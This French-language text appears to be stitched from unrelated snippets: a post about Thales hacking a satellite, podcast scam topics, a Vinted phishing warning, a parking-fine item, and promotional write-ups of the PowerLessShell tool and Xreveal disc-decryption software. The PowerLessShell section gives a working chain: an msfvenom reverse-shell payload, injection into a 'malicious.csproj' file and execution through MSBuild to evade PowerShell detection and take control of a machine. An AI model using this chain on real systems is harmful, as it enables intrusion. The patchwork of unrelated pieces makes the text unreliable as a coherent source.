🚀 Mais ce qui a particulièrement retenu mon attention, c'est la rencontre avec l'équipe de Thales, l'un des leaders mondiaux en matière de technologie et de sécurité. Ils ont épaté tout le monde en réussissant à hacker un satellite lors d'un exercice en direct, démontrant l'importance cruciale de protéger les infrastructures spatiales contre les Cyber menaces. 🛰️
💼 En plus de vivre une soirée de rêve aux côtés de passionnés, j'ai découvert que Thales recherche activement des personnes intéressées par ce domaine pour rejoindre leur équipe. Si vous êtes passionnés par la cybersécurité et souhaitez faire partie d'une entreprise à la pointe de la technologie, ne manquez pas cette opportunité ! 💼
Appels téléphoniques frauduleux
Message WhatsApp venant d'Asie
Email des impôts pour payer en Bitcoin ???
Nicole demande comment elle a pu se faire voler de l'argent en vendant sur un site de seconde main.
---
Send in a voice message: https://podcasters.spotify.com/pod/show/fraudeur-hacker-et-vous/message
Les utilisateurs de Vinted sont ciblés par une nouvelle campagne de phishing. Via des e-mails frauduleux, les pirates se font passer pour la plateforme et tentent de collecter les informations bancaires des usagers. Ne vous faites pas avoir !
Le 3 juillet 2023, un retraité a eu la petite surprise de recevoir une amende pour avoir laissé la fenêtre passager de sa voiture ouverte. En Allemagne, sécuriser son véhicule à l'arrêt est obligatoire, selon l'article 38a du code de la route. Quid de la France, alors ?
PowerLessShell est un outil incroyable pour les passionnés de PowerShell et de sécurité informatique. Qui aurait cru qu’on pouvait exécuter des scripts et des commandes PowerShell sans même lancer powershell.exe ? Et pour couronner le tout, il permet également d’exécuter du shellcode brut ! C’est de la sorcellerie !
La puissance de cet outil réside dans son utilisation de MSBuild.exe. La combinaison des deux permet d’obtenir un résultat vraiment cool pour les pro du Powershell. Certaines conditions peuvent être utilisées avec MSBuild pour empêcher l’exécution du code si elles ne sont pas remplies, ce qui ajoute une couche de sécurité.
La beauté de PowerLessShell, c’est qu’il utilise des arguments de ligne de commande pour générer le fichier final et il peut générer une charge utile PowerShell ou shellcode. C’est donc très utile également pour les pros en sécurité informatique.
Le concept est très bien expliqué avec des exemples concrets comme celui-ci :
$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed
Le processus est assez simple et direct, même pour ceux qui n’ont pas beaucoup d’expérience avec PowerShell ou MSBuild.
Et ce n’est pas tout ! Un script nommé Cobalt Strike Aggressor (wmi_msbuild.cna) est également disponible avec des instructions pour la configuration et l’utilisation. Si vous n’avez jamais entendu parler de Cobalt Strike, c’est une plateforme de post-exploitation professionnelle de qualité militaire.
Le plus impressionnant, c’est que tout ceci a été mis au point par une seule personne : Mr.Un1k0d3r.
Alors, comment utiliser ce merveilleux outil en pratique ?
Voici un exemple d’utilisation de PowerLessShell pour générer un shellcode avec l’outil msfvenom de Metasploit et ensuite l’exécuter avec MSBuild :
msfvenom -a x64 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b '\\x00\\x0A\\x0D' -i 20 -f csharp
Ensuite, utilisez PowerLessShell pour injecter le shellcode dans un fichier MSBuild :
PowerLessShell.exe -s <shellcode> -w 20
Finalement, exécutez le fichier malveillant avec MSBuild :
MSBuild.exe malicious.csproj
Voilà, le tour est joué ! Il vous suffira d’écouter la connexion entrante shell_reverse_tcp sur votre serveur pour guetter la connexion du client malveillant et prendre le contrôle. C’est un exemple simple mais puissant de ce que PowerLessShell peut faire. Evidemment, c’est à manipuler avec éthique, dans un cadre de recherche ou lors d’une mission de sécurité informatique.
En conclusion, que vous soyez un professionnel de la sécurité informatique ou simplement quelqu’un qui aime bidouiller et apprendre, cet outil vous surprendra à coup sûr. N’hésitez pas à visiter le GitHub de PowerLessShell pour en savoir plus ici.
Aujourd’hui, je vous présente Xreveal, le petit génie dans la lampe qui va vous permettre de déchiffrer vos DVD et Blu-ray en arrière-plan, le tout en un rien de temps ! Mais avant de vous en dire plus, mettons les choses au clair : vous aurez besoin de clés de décryptage AACS/FUT BD+ pour faire fonctionner ce logiciel.
À première vue, Xreveal peut sembler un simple logiciel de déchiffrement de DVD/BD, mais détrompez-vous, il est bien plus que ça. Ce logiciel est le fruit d’un projet de recherche visant à faciliter l’interopérabilité et s’appuie exclusivement sur la spécification publique officielle AACS pour décoder les disques. En d’autres termes, Xreveal est un précieux allié pour les adeptes du Home Cinéma tels que vous et moi.
Grâce à Xreveal, fini les problèmes de lecture de DVD ou de Blu-ray protégés par un système de verrouillage. En effet, ce logiciel déchiffre la sécurité des DVD/BD à la volée, permettant ainsi à votre programme de lecture ou de copie de les lire sans aucune difficulté. C’est comme avoir son propre passe-partout pour accéder à tous ces films que vous adorez ! 🗝️
L’un des points forts de Xreveal réside dans sa simplicité d’utilisation. Une fois le logiciel installé, il fonctionne en arrière-plan sans même que vous vous en aperceviez. En parallèle, il vous donne la possibilité de lire ou de copier vos DVD/BD protégés en toute tranquillité.Maintenant que vous êtes convaincus de la puissance de Xreveal, voici un petit tutoriel pour vous aider à l’installer et à l’utiliser:
Installez Xreveal en suivant les instructions à l’écran.
Le logiciel est maintenant prêt à l’emploi ! Insérez un DVD ou Blu-ray protégé dans le lecteur de votre choix et Xreveal déchiffrera automatiquement le disque à la volée pour que vous puissiez le lire sans problème.
Et voilà, le tour est joué ! Vous pouvez désormais profiter de tous vos DVD et Blu-ray sans vous soucier des systèmes de protection. Alors oui, je sais, ça serait mieux avec la clé de déchiffrement, mais comme c’est illégal de la partager, bah c’est pas dans le soft.
En somme, si vous êtes à la recherche d’une solution simple et efficace pour décoder vos DVD et Blu-ray, ne cherchez pas plus loin. Xreveal est sans conteste l’outil qu’il vous faut. À noter que Xreveal n’a pas pour vocation de promouvoir le piratage. Il s’agit simplement d’un outil d’interopérabilité pour les passionnés de Home Cinéma.